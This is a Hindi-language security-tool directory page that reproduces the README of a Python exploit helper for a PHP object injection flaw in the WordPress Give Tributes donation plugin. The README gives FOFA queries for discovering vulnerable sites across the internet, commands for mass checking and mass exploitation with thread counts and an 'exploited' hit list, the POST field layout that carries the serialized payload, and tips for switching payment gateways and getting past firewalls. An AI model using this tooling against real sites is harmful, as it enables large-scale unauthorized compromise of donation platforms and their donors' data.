Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-19658 — CVE-2026-19658 के लिए Python 3 चेकर और एक्सप्लॉइट हेल्पर, जो WordPress Give Tributes PHP ऑब्जेक्ट इंजेक्शन फ्लॉ है, जिसमें FOFA टारगेट डिस्कवरी और लेगेसी डोनेशन फॉर्म एक्सप्लॉइटेशन शामिल है। | Kitploit
उपकरण/GitHubGitHub/murrez/cve-2026-19658
टोहीभेद्यता स्कैनरभेद्यता विश्लेषणशोषणस्क्रिप्टिंग और स्वचालनवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHub
151 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
murrez/cve-2026-19658

CVE-2026-19658

CVE-2026-19658 के लिए Python 3 चेकर और एक्सप्लॉइट हेल्पर, जो WordPress Give Tributes PHP ऑब्जेक्ट इंजेक्शन फ्लॉ है, जिसमें FOFA टारगेट डिस्कवरी और लेगेसी डोनेशन फॉर्म एक्सप्लॉइटेशन शामिल है।

रिपॉजिटरी देखें

CVE-2026-19658 — Give Tributes अनधिकृत PHP ऑब्जेक्ट इंजेक्शन

Python 3 प्रूफ-ऑफ-कॉन्सेप्ट स्कैनर और डोनेशन-चेन एक्सप्लॉइट हेल्पर CVE-2026-19658 के लिए, WordPress ऐड-ऑन Give - Tributes (Liquid Web / GiveWP) में।

प्लेटफ़ॉर्मWordPress प्लगइन (GiveWP कोर आवश्यक)
घटकGive - Tributes
प्रभावित≤ 2.3.1
में ठीक किया गया2.3.1.1+ (सैनिटाइज़्ड मल्टी-रिसिपिएंट eCard फ़ील्ड)
CVSS9.8 Critical
प्रमाणीकरणअनधिकृत (लेगेसी डोनेशन फ़ॉर्म)
CWECWE-502 — अविश्वसनीय डेटा का डीसीरियलाइज़ेशन
असाइनरWordfence

सारांश

जब eCards के लिए Allow Multiple Recipients सक्षम हो और eCard custom message अक्षम हो (डिफ़ॉल्ट), तो कमजोर संस्करण डोनेशन मेटा में कच्चा $_POST eCard प्राप्तकर्ता डेटा संग्रहीत करते हैं। GiveWP फ़ील्ड सत्यापन $_POST की एक give_clean() प्रति का उपयोग करता है (सीरियलाइज़्ड स्ट्रिंग्स वहाँ खाली कर दी जाती हैं), लेकिन insert_tribute_data() असैनिटाइज़्ड $_POST पढ़ता है, इसलिए दूसरे प्राप्तकर्ता के first_name / last_name में एक PHP सीरियलाइज़्ड ऑब्जेक्ट हो सकता है।

प्रभाव: अकेले Give Tributes के भीतर कोई ज्ञात POP चेन नहीं। मेटा को पढ़ते समय डीसीरियलाइज़ किया जाता है (जैसे admin eCard preview/resend)। RCE या विनाशकारी प्रभाव के लिए किसी अन्य इंस्टॉल किए गए प्लगइन या थीम से गैजेट चेन की आवश्यकता होती है।

सर्वर-साइड पूर्वापेक्षाएँ

  1. Give Tributes ≤ 2.3.1
  2. Allow Multiple Recipients सक्षम (ग्लोबल या प्रति-फ़ॉर्म)
  3. eCard Custom Message अक्षम (डिफ़ॉल्ट)
  4. सार्वजनिक लेगेसी Give फ़ॉर्म ([give_form] / v2), न कि केवल v3 Visual Form Builder
  5. एक पेमेंट गेटवे जो आपके परीक्षण में डोनेशन पूरा कर सके (अक्सर dev/staging पर manual)

आवश्यकताएँ

  • Python 3.8+
  • pip install -r requirements.txt

त्वरित शुरुआत

root@kitploit:~
pip install -r requirements.txt

# Single target — check (terminal flow on by default for --list)
python poc.py -u https://target.example --mode check

# Mass check
python poc.py --list targets.example.txt --mode check --threads 20 --flow

# Single target — exploit (authorized targets only)
python poc.py -u https://target.example --mode exploit \
  --form-url /donate/ --form-id 123 --gateway manual \
  --payload 'O:8:"stdClass":0:{}'

# Mass exploit from check output
python poc.py --list candidates.jsonl --mode exploit --threads 8 --flow \
  --vuln-list exploited.txt

FOFA → लक्ष्य सूची

उदाहरण:

root@kitploit:~
body="/wp-content/plugins/give-tributes/"
body="give-tributes" && body="givewp"

होस्ट सूची (प्रति पंक्ति एक डोमेन):

root@kitploit:~
python poc.py --list my_hosts.txt --mode check --threads 20 --flow

FOFA CSV निर्यात:

root@kitploit:~
python fofa_to_list.py -i fofa_export.csv
python poc.py --list list.txt --mode check --threads 20

CLI विकल्प

एक्सप्लॉइट रन पर --vuln-list exploited.txt का उपयोग करें ताकि hits.txt में चेक हिट्स अधिलेखित न हों।

आउटपुट फ़ाइलें

चेक status मान

रिमोट स्कैन विश्वसनीय रूप से "Allow Multiple Recipients" नहीं देख सकता; कैंडिडेट्स एक्सप्लॉइट के समय विफल हो सकते हैं।

एक्सप्लॉइट नोट्स

  • PoC दो eCard प्राप्तकर्ता भेजता है; पेलोड दूसरा first_name फ़ील्ड है।
  • manual गेटवे अक्सर प्रोडक्शन में अक्षम होता है — फ़ॉर्म पर दिखने वाले गेटवे आज़माएँ (stripe, paypal, test, …)।
  • सफलता के लिए Give रसीद मार्कर आवश्यक हैं ("thank you" वाली सामान्य पेज कॉपी नहीं)। फ़ॉर्म अभी भी मौजूद रहते हुए वही URL सफलता नहीं गिना जाता।
  • give validation rejected donation: tribute/notify विकल्प, राशि, या गेटवे बेमेल।
  • HTTP 403: WAF (Sucuri, MalCare, आदि) POST को ब्लॉक कर रहा है।
  • केवल v3 फ़ॉर्म: लेगेसी फ़ॉर्म URL का उपयोग करें या छोड़ दें (प्रोसेसर लेगेसी एंडपॉइंट पर v3 ID अस्वीकार करता है)।

POST आकार (लेगेसी फ़ॉर्म)

root@kitploit:~
give_tributes_show_dedication=yes
give_tributes_would_to=send_eCard
give_tributes_ecard_notify[recipient][first_name][]=Valid
give_tributes_ecard_notify[recipient][first_name][]=<serialized payload>
give_tributes_ecard_notify[recipient][email][]=<donor email>
give_tributes_ecard_notify[recipient][email][][email protected]
…

रिपॉज़िटरी लेआउट

root@kitploit:~
.
├── poc.py
├── fofa_to_list.py
├── requirements.txt
├── targets.example.txt
├── README.md
├── LICENSE
└── .gitignore

स्थानीय स्कैन सूचियाँ और रन आर्टिफ़ैक्ट्स (list.txt, fofa*.csv, *.jsonl, hits.txt, …) .gitignore में हैं और इन्हें कमिट नहीं किया जाना चाहिए।

संदर्भ

  • NVD — CVE-2026-19658
  • Give Tributes readme (fix note 2.3.1.1)
  • GiveWP plugin

कानूनी

केवल अधिकृत सुरक्षा परीक्षण और शिक्षा के लिए। लागू कानूनों और कार्यक्रम नियमों के अनुपालन की जिम्मेदारी आपकी है।

टूल डाउनलोड करें
विकल्पविवरण
-u, --urlएकल बेस URL
--listURL सूची, होस्ट फ़ाइल, या candidates.jsonl
--modecheck या exploit
--form-urlडोनेशन पेज पथ या पूर्ण URL
--form-idGive फ़ॉर्म पोस्ट ID
--pathsफ़ॉर्म के लिए क्रॉल करने हेतु अतिरिक्त पथ
--payloadदूसरे प्राप्तकर्ता के first_name के लिए सीरियलाइज़्ड ऑब्जेक्ट
--gatewayGive payment-mode (डिफ़ॉल्ट manual)
--emailदानकर्ता give_email
--flowमास रन पर प्रति लक्ष्य एक पंक्ति (डिफ़ॉल्ट --list के साथ)
--no-flowकेवल प्रगति सारांश
--quiet, -qन्यूनतम कंसोल आउटपुट
--threads, -jमास कन्करेंसी (डिफ़ॉल्ट 12)
--outputJSONL लॉग (डिफ़ॉल्ट cve_2026_19658_results.jsonl)
--vuln-listटेक्स्ट हिट्स / एक्सप्लॉइटेड पंक्तियाँ (डिफ़ॉल्ट hits.txt)
--candidates-listचेक मेटाडेटा JSONL (डिफ़ॉल्ट candidates.jsonl)
फ़ाइलमोडसामग्री
cve_2026_19658_results.jsonlदोनोंप्रति लक्ष्य पूर्ण JSON
hits.txtcheckexploitable_candidate वाले URL
candidates.jsonlcheckbest_form, संस्करण संकेत
exploited.txtexploiturl|payment=… जब डोनेशन की पुष्टि हो
स्थितिअर्थ
candidateकमजोर प्लगइन + Give + tributes UI वाला लेगेसी फ़ॉर्म
vulnerable_no_formप्लगइन/संस्करण ठीक, क्रॉल किए गए पथों पर कोई उपयुक्त फ़ॉर्म नहीं मिला
patchedTributes > 2.3.1 या ≥ 2.3.1.1 (जब संस्करण पढ़ा जा सके)
give_onlyपता लगाने योग्य Tributes के बिना Give
no_pluginTributes का पता नहीं चला